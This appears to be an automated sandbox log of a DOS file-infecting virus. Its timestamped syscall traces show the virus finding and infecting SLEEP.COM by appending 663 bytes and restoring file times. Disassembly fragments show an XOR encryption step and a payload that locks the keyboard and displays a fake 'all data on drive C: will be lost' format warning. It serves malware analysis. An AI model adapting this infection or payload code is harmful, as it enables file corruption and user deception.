2018-12-25T12:27:45.036924622Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.038320019Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.045671622Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.055246569Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.05804049Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.060069311Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.066214535Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.075651861Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.08327181Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.08508248Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.091478737Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.093867026Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.096453169Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.104681178Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.107095698Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.112659702Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.113735324Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.1223243Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.132829035Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.135358062Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.13698813Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.142452854Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.151886416Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.15892251Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.160315914Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.166440519Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.168697181Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.17108714Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.1792957Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.182104785Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.193599427Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.195270285Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.204164669Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.213642834Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.216076748Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.217699819Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.223253417Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.232973505Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.240252081Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.241997686Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.248633284Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.251196284Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.253966502Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.262924775Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.265438385Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.272804982Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.27455621Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.282465611Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.296933504Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.301022523Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.302111287Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.310173747Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.321780658Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.334327792Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.343092413Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.359841551Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.362218422Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.380336965Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.393853116Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.395575021Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.403101489Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.405136719Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.413009673Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.424220923Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.427453953Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.428834112Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.436210795Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.446312893Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.458023905Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.460516187Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.467914711Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.469767808Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.477483987Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.487571567Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.490982907Z 78 PC: 12c03 | Find first file
2018-12-25T12:27:45.501673609Z 78 PC: 12c03 | Find first file (See above)
2018-12-25T12:27:45.507278083Z 78 PC: 12b95 | Find first file
2018-12-25T12:27:45.515454422Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl
0x12cc4: je 0x12cc7
0x12cc6: ret
0x12cc7: cli
0x12cc8: mov al, 0xad
0x12cca: out 0x64, al
0x12ccc: nop
0x12ccd: sti
0x12cce: mov dx, di
0x12cd0: add dx, 0x215
0x12cd4: mov ah, 9
0x12cd6: int 0x21
0x12cd8: cli
0x12cd9: jmp 0x12cd9
0x12cdb: add word ptr [bx], di
0x12cdd: aas
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-25T12:27:45.517161632Z 26 PC: 12ad4 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10339,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:45.301369045Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:45.303324802Z 78 PC: 12ab5 | Find first file
2018-12-25T12:27:45.309651721Z 47 PC: 12abb | Get disk transfer address
2018-12-25T12:27:45.311126633Z 67 PC: 12c40 | Get or set file attributes
2018-12-25T12:27:45.318457928Z 67 PC: 12c48 | Get or set file attributes
2018-12-25T12:27:45.334801857Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:45.342477838Z 87 PC: 12c55 | Get or set file date and time
2018-12-25T12:27:45.345005204Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:45.35226746Z 66 PC: 12b17 | Move file pointer
2018-12-25T12:27:45.354004917Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-25T12:27:45.356720831Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-25T12:27:45.36730759Z 66 PC: 12b35 | Move file pointer
2018-12-25T12:27:45.368832208Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:45.380696238Z 87 PC: 12b5e | Get or set file date and time
2018-12-25T12:27:45.384549502Z 62 PC: 12b64 | Close file
2018-12-25T12:27:45.393223232Z 67 PC: 12b6b | Get or set file attributes
2018-12-25T12:27:45.403479292Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.407616219Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.409054105Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.414986135Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.425746823Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.4333578Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.434976821Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.441964494Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.443587365Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.446065659Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.455266064Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.456915047Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.463371462Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.46527045Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.473816007Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.483677677Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.487226065Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.488902301Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.494738944Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.504997709Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.518381096Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.520061758Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.526725059Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.529316696Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.531965693Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.540464584Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.543141387Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.54856083Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.549653585Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.554857184Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.561271802Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.563714661Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.565382355Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.571140819Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.580466246Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.587106695Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.589313248Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.595579185Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.596951635Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.600166198Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.60812231Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.609486749Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.616393247Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.618048366Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.625639488Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.635960057Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.638773646Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.639609326Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.643799657Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.650062122Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.654307725Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.655875194Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.659906866Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.660975388Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.662771569Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.668401446Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.669467024Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.674496641Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.676827494Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.68434199Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.693798986Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.696502081Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.697745526Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.70345033Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.716552331Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.722794791Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.724032727Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.730851897Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.732211768Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.734804492Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.744513174Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.74605427Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.752469334Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.755009775Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.762866796Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.772519151Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.77667055Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.778224254Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.783803831Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.793894265Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.800691422Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.802259583Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.809268801Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.811141984Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.813670807Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.822031736Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.824315099Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.831034743Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.832430682Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.841011163Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.850540722Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.85328574Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.855524316Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.861180251Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.871095737Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.878592773Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.879994076Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.886293466Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.889001321Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.896160064Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.909740474Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.913967263Z 78 PC: 12c03 | Find first file
2018-12-25T12:27:45.920459861Z 78 PC: 12c03 | Find first file (See above)
2018-12-25T12:27:45.926203295Z 78 PC: 12b95 | Find first file
2018-12-25T12:27:45.932828674Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl
0x12cc4: je 0x12cc7
0x12cc6: ret
0x12cc7: cli
0x12cc8: mov al, 0xad
0x12cca: out 0x64, al
0x12ccc: nop
0x12ccd: sti
0x12cce: mov dx, di
0x12cd0: add dx, 0x215
0x12cd4: mov ah, 9
0x12cd6: int 0x21
0x12cd8: cli
0x12cd9: jmp 0x12cd9
0x12cdb: add word ptr [bx], di
0x12cdd: aas
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-25T12:27:45.934930382Z 9 PC: 12cd8 | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)? Yes Ok')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":10339,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:45.656477839Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:45.657962932Z 78 PC: 12ab5 | Find first file
2018-12-25T12:27:45.666214976Z 47 PC: 12abb | Get disk transfer address
2018-12-25T12:27:45.667735901Z 67 PC: 12c40 | Get or set file attributes
2018-12-25T12:27:45.67430675Z 67 PC: 12c48 | Get or set file attributes
2018-12-25T12:27:46.09736903Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:46.105020021Z 87 PC: 12c55 | Get or set file date and time
2018-12-25T12:27:46.106965527Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:46.115102051Z 66 PC: 12b17 | Move file pointer
2018-12-25T12:27:46.117230706Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-25T12:27:46.120210801Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-25T12:27:46.130058905Z 66 PC: 12b35 | Move file pointer
2018-12-25T12:27:46.133013075Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:46.140394406Z 87 PC: 12b5e | Get or set file date and time
2018-12-25T12:27:46.142359965Z 62 PC: 12b64 | Close file
2018-12-25T12:27:46.15129732Z 67 PC: 12b6b | Get or set file attributes
2018-12-25T12:27:46.161822552Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.16461747Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.166446146Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.172866662Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.184062428Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.191666772Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.205419593Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.212333243Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.214619442Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.217201216Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.225968647Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.227623111Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.235335936Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.236883642Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.245492753Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.256311314Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.259124335Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.260422378Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.267511874Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.278197763Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.285719379Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.288321638Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.295534309Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.297430456Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.301256228Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.306943561Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.308073011Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.312782636Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.314322114Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.319671434Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.325878431Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.328127993Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.328916618Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.332425617Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.339127493Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.351795974Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.353326181Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.361310732Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.36290855Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.366362068Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.376482863Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.378070148Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.385284204Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.396899083Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.411510727Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.422373682Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.425502542Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.427460638Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.434491779Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.445379196Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.453736614Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.455414341Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.462581312Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.464964504Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.467641342Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.476940935Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.479076748Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.486409164Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.488220489Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.498801504Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.509885903Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.512729226Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.514258397Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.52067064Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.53152984Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.539302865Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.54107816Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.548216138Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.549976991Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.553132986Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.564102326Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.565666965Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.573969659Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.575748274Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.585299986Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.597466932Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.600417333Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.60158004Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.608288022Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.619179691Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.632441493Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.634696353Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.641900371Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.64348786Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.646405901Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.655828665Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.657851165Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.665044495Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.667002213Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.67549579Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.686120637Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.690244341Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.691502602Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.69776766Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.709123979Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.716372603Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.717766837Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.725644022Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.727191639Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.734954972Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.746628037Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.749322028Z 78 PC: 12c03 | Find first file
2018-12-25T12:27:46.75648188Z 78 PC: 12c03 | Find first file (See above)
2018-12-25T12:27:46.763332768Z 78 PC: 12b95 | Find first file
2018-12-25T12:27:46.769680463Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl
0x12cc4: je 0x12cc7
0x12cc6: ret
0x12cc7: cli
0x12cc8: mov al, 0xad
0x12cca: out 0x64, al
0x12ccc: nop
0x12ccd: sti
0x12cce: mov dx, di
0x12cd0: add dx, 0x215
0x12cd4: mov ah, 9
0x12cd6: int 0x21
0x12cd8: cli
0x12cd9: jmp 0x12cd9
0x12cdb: add word ptr [bx], di
0x12cdd: aas
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-25T12:27:46.772035828Z 26 PC: 12ad4 | Set disk transfer address